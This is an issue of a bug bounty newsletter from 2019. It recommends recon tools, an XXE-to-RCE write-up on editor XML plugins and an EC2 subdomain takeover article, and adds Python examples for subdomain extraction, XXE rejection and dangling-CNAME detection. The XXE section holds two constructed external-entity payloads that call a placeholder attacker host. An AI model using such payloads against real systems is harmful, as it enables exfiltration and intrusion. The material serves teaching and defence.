Bug Bytes #42 – XML to RCE, GitHub for Recon & Cloud Hacking Heaven

By Intigriti

October 29, 2019

Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series are curated by Mariem, better known as PentesterLand. Every week, she keeps us updated with a comprehensive list of all write-ups, tools, tutorials and resources we should not have missed.

This issue covers the week from 18 to 25 October.

intigriti news

Our favorite 5 hacking items

1. Tools of the week

Github-subdomains.py
Erlenc

Github-subdomains.py is one of the many GitHub recon scripts shared lately by @gwendallecoguic. It takes a domain as input and returns the subdomains of that domain found in content hosted on GitHub.
Sometimes this is exactly what you need for recon or OSINT!
Erlenc does one thing too: it is a command line tool for URL-encoding and URL-decoding data streams. It is useful for scripting, or if you find yourself juggling URL encoding all the time during tests.
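The extraction step behind a GitHub subdomain script is a hostname regex run over whatever text the search returns. The following is an added example (not the code of Github-subdomains.py or of its author): it implements that matching over a constructed sample of search hits, so the interesting cases are visible: mixed case, a lookalike domain, a subdomain glued into a longer attacker hostname, and the bare apex, which should not count as a subdomain.

```python
import re

# Constructed sample standing in for GitHub code-search hits; not real repository content.
SAMPLE_HITS = """
API_URL = "https://api.example.com/v1"
staging host: Staging-Admin.Example.COM
https://cdn.example.com.evil.net/x
mail.notexample.com
git clone git@git.example.com:team/repo.git
http://dev.internal.example.com:8443/health
https://example.com/login
"""

# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"


def subdomain_pattern(domain: str) -> "re.Pattern[str]":
    """Compile a matcher for subdomains of `domain`.

    Requires at least one label before the apex (the apex alone is not a subdomain),
    refuses a preceding hostname character (so notexample.com is not a hit) and refuses
    a following label (so cdn.example.com.evil.net is not reported as cdn.example.com).
    """
    return re.compile(
        r"(?<![a-z0-9.-])((?:" + _LABEL + r"\.)+" + re.escape(domain.lower()) + r")"
        r"(?![a-z0-9-]|\.[a-z0-9])",
        re.IGNORECASE,
    )


def find_subdomains(domain: str, text: str) -> set:
    """Return the lower-cased, de-duplicated set of subdomains of `domain` seen in `text`."""
    return {m.group(1).lower() for m in subdomain_pattern(domain).finditer(text)}


if __name__ == "__main__":
    for host in sorted(find_subdomains("example.com", SAMPLE_HITS)):
        print(host)
```

In a real run the text would be the page or API responses for a search such as `"example.com"`, paged through and concatenated; the regex does not change. Hits still need resolving afterwards, since code often references hosts that no longer exist.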

2. Writeup of the week

Don’t open that XML: XXE to RCE in XML plugins for VS Code, Eclipse, Theia, …

Exploiting an XXE during a pentest unexpectedly triggered two DNS interactions instead of one. This led the authors to investigate and discover that opening the XXE payload in their text editor was triggering the second interaction.
What others might have dismissed became the subject of very interesting research: from weaponizing the XXE to get RCE, to testing other products that share the same underlying vulnerable library. There are many lessons in this writeup, both technical and about mindset and tenacity.
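To make the mechanism concrete, here is an added example (not code from the writeup or from any of the affected products): a constructed out-of-band XXE payload of the kind that produces such a DNS interaction, next to a guard that refuses external entity declarations before the parser ever sees them. The `canary.example` hostname is a placeholder for an attacker-controlled domain, and the guard is a pre-parse check on the raw bytes, so it works whichever XML library sits behind it.

```python
import io
import re
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Constructed payload: resolving the external entity makes the parser look up an
# attacker-chosen hostname, which is how an unexpected DNS interaction appears when an
# editor or plugin parses the file. "oob-token.canary.example" is a placeholder.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "http://oob-token.canary.example/">
]>
<data>&xxe;</data>
"""

# Parameter-entity variant: the fetch happens while the DTD itself is processed,
# so the document body never has to reference anything.
XXE_PARAM_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY % dtd SYSTEM "http://oob-token.canary.example/evil.dtd">
  %dtd;
]>
<data/>
"""

BENIGN_XML = b'<?xml version="1.0"?><data>hello</data>'

_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity declared with a SYSTEM or PUBLIC identifier.
_EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+(?:%\s*)?\S+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE)


def has_external_entities(xml_bytes: bytes) -> bool:
    """True if the document declares an external general or parameter entity."""
    return bool(_DOCTYPE.search(xml_bytes) and _EXTERNAL_ENTITY.search(xml_bytes))


class _TextCollector(ContentHandler):
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def safe_parse_text(xml_bytes: bytes, allow_dtd: bool = False) -> str:
    """Parse untrusted XML and return its character data.

    Rejects any DOCTYPE unless the caller opts in, rejects external entities always,
    and disables external entity resolution in the parser as a second line of defence.
    """
    if not allow_dtd and _DOCTYPE.search(xml_bytes):
        raise ValueError("DOCTYPE not allowed in untrusted input")
    if has_external_entities(xml_bytes):
        raise ValueError("external entity declaration refused")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    handler = _TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(handler.parts)


def is_rejected(xml_bytes: bytes, allow_dtd: bool = False) -> bool:
    """Convenience wrapper: True if safe_parse_text refuses the document."""
    try:
        safe_parse_text(xml_bytes, allow_dtd)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_XML), ("xxe", XXE_PAYLOAD), ("xxe-param", XXE_PARAM_PAYLOAD)):
        print(label, "rejected" if is_rejected(doc, allow_dtd=True) else "parsed")
```

The lesson of the writeup applies to the guard as well: the check has to run in every component that parses the file, including the editor plugin, not just in the application that was originally being tested.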

3. Conference of the week

Kawaiicon 2019 – Liar, Liar: a first-timer “red-teaming” under unusual restrictions

This is the story of an unusual red teaming mission. I don't want to spoil it by saying too much, so let's just say that it is captivating, witty, and perfect for those times when you want to relax while still doing something hacking-related.

4. Resource of the week

Cloud Security Wiki

This is a collection of links for cloud security (from both offensive and defensive aspects). They are organized by topic: AWS/Google/Azure Cloud, vulnerable apps, Kubernetes and Docker.
It is nice to have all these resources at the same place. It should help if you’re interested in Cloud security and don’t know where to start.
I am also realizing there are some tools and presentations listed that I haven’t checked out yet.

5. Article of the week

Attempting EC2 Subdomain Takeover

Subdomain takeovers are getting harder to find on bug bounty programs. This article breaks down a more subtle form of the attack, one that affects some subdomains pointing to EC2 instances.
Who knows, it might help you get some of those juicy bounties!
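As an added illustration (not the article's own code or method) of where such records hide, the following checks a zone for CNAMEs that point at EC2 public DNS names. The name itself only encodes an IP and a region, so the useful question is whether that IP is still one the organization owns, which is what the check asks. The DNS records and the set of owned addresses are constructed here; in practice the latter would come from the account's instance and Elastic IP inventory.

```python
import ipaddress
import re
from typing import Iterable, List, NamedTuple, Optional, Set, Tuple

# EC2 public DNS naming: ec2-<a>-<b>-<c>-<d>.<region>.compute.amazonaws.com, with the
# legacy "compute-1" label standing for us-east-1. Trailing dot tolerated for zone-file input.
EC2_PUBLIC_HOSTNAME = re.compile(
    r"^ec2-(\d{1,3})-(\d{1,3})-(\d{1,3})-(\d{1,3})\."
    r"(?:(compute-1)|([a-z]{2}(?:-[a-z]+)+-\d)\.compute)\.amazonaws\.com\.?$"
)


class Ec2Target(NamedTuple):
    ip: str
    region: str


class Finding(NamedTuple):
    name: str
    target: str
    ip: str
    region: str


def parse_ec2_hostname(host: str) -> Optional[Ec2Target]:
    """Extract the public IP and region encoded in an EC2 public DNS name, or None."""
    m = EC2_PUBLIC_HOSTNAME.match(host.strip().lower())
    if not m:
        return None
    ip = ".".join(m.group(i) for i in range(1, 5))
    try:
        ipaddress.IPv4Address(ip)  # rejects octets above 255
    except ValueError:
        return None
    region = "us-east-1" if m.group(5) else m.group(6)
    return Ec2Target(ip, region)


def find_dangling_ec2_cnames(records: Iterable[Tuple[str, str, str]], owned_ips: Set[str]) -> List[Finding]:
    """Report CNAMEs whose EC2 target encodes an IP the organization no longer holds."""
    findings = []
    for name, rtype, value in records:
        if rtype.upper() != "CNAME":
            continue
        target = parse_ec2_hostname(value)
        if target is not None and target.ip not in owned_ips:
            findings.append(Finding(name, value, target.ip, target.region))
    return findings


# Constructed zone excerpt and inventory (documentation IP ranges, not real hosts).
RECORDS = [
    ("app.example.com", "CNAME", "ec2-203-0-113-10.eu-west-1.compute.amazonaws.com"),
    ("old.example.com", "CNAME", "ec2-198-51-100-7.compute-1.amazonaws.com"),
    ("www.example.com", "CNAME", "example.github.io"),
    ("api.example.com", "A", "203.0.113.20"),
]
OWNED_IPS = {"203.0.113.10", "203.0.113.20"}


if __name__ == "__main__":
    for f in find_dangling_ec2_cnames(RECORDS, OWNED_IPS):
        print(f"{f.name} -> {f.target}: {f.ip} in {f.region} is not in the inventory")
```

A hit is a candidate, not a confirmed takeover: the address may have been released to the pool, or may belong to another account entirely, so the next step is to verify ownership and retire or repoint the record.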

Other amazing things we stumbled upon this week

Videos

Podcasts

Webinars & Webcasts

Conferences

Slides only

Tutorials

Medium to advanced

Beginners corner

Writeups

Challenge writeups

Pentest writeups

Responsible(ish) disclosure writeups

Bug bounty writeups

See more writeups on The list of bug bounty writeups.

Tools

If you don’t have time

  • Stepper: A Burp extension designed to be a natural evolution of Burp Suite’s Repeater tool, providing the ability to create sequences of steps and define regular expressions to extract values from responses which can then be used in subsequent steps

  • GitHunter: A tool for searching a Git repository for interesting content

  • Jsfuzz: Coverage-guided fuzzer for testing JavaScript/NodeJS packages

More tools, if you have time

  • Domain-finder: Quick script to find domains that belong to a company through http://whoxy.com (key required but free)

  • Apk-mitm: A CLI application that prepares Android APK files for HTTPS inspection

  • Ntlmscan: Scan for NTLM directories

  • Dirstalk: Modern alternative to dirbuster/dirb

  • RAS-Fuzzer: RAndom Subdomain Fuzzer

  • SUID3NUM: Python script to enumerate SUID binaries, separate default binaries from custom binaries, cross-match those with the binaries in the GTFOBins repository & auto-exploit those

  • BabooSSH: Python script that allows you, from a simple SSH connection to a compromised host, to quickly gather info on other SSH endpoints to pivot and compromise them.

  • Lava: Microsoft Azure exploitation framework

  • HomePWN: Swiss Army Knife for Pentesting of IoT Devices

  • OneLogicalMyth_Shell: A HTA shell to assist with breakout assessments

  • PHuiP-FPizdaM: Exploit for a bug in php-fpm (CVE-2019-11043)

Misc. pentest & bug bounty resources

Challenges

Articles

News

Bug bounty & Pentest news

Reports

Vulnerabilities

Breaches & Attacks

Malicious apps/sites

Other news

Non technical

Tweeted this week

We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 10/18/2019 to 10/25/2019.

Curated by Pentester Land & Sponsored by Intigriti

Disclaimer: The views and opinions expressed in this article are those of the curators and do not necessarily reflect the position of intigriti.
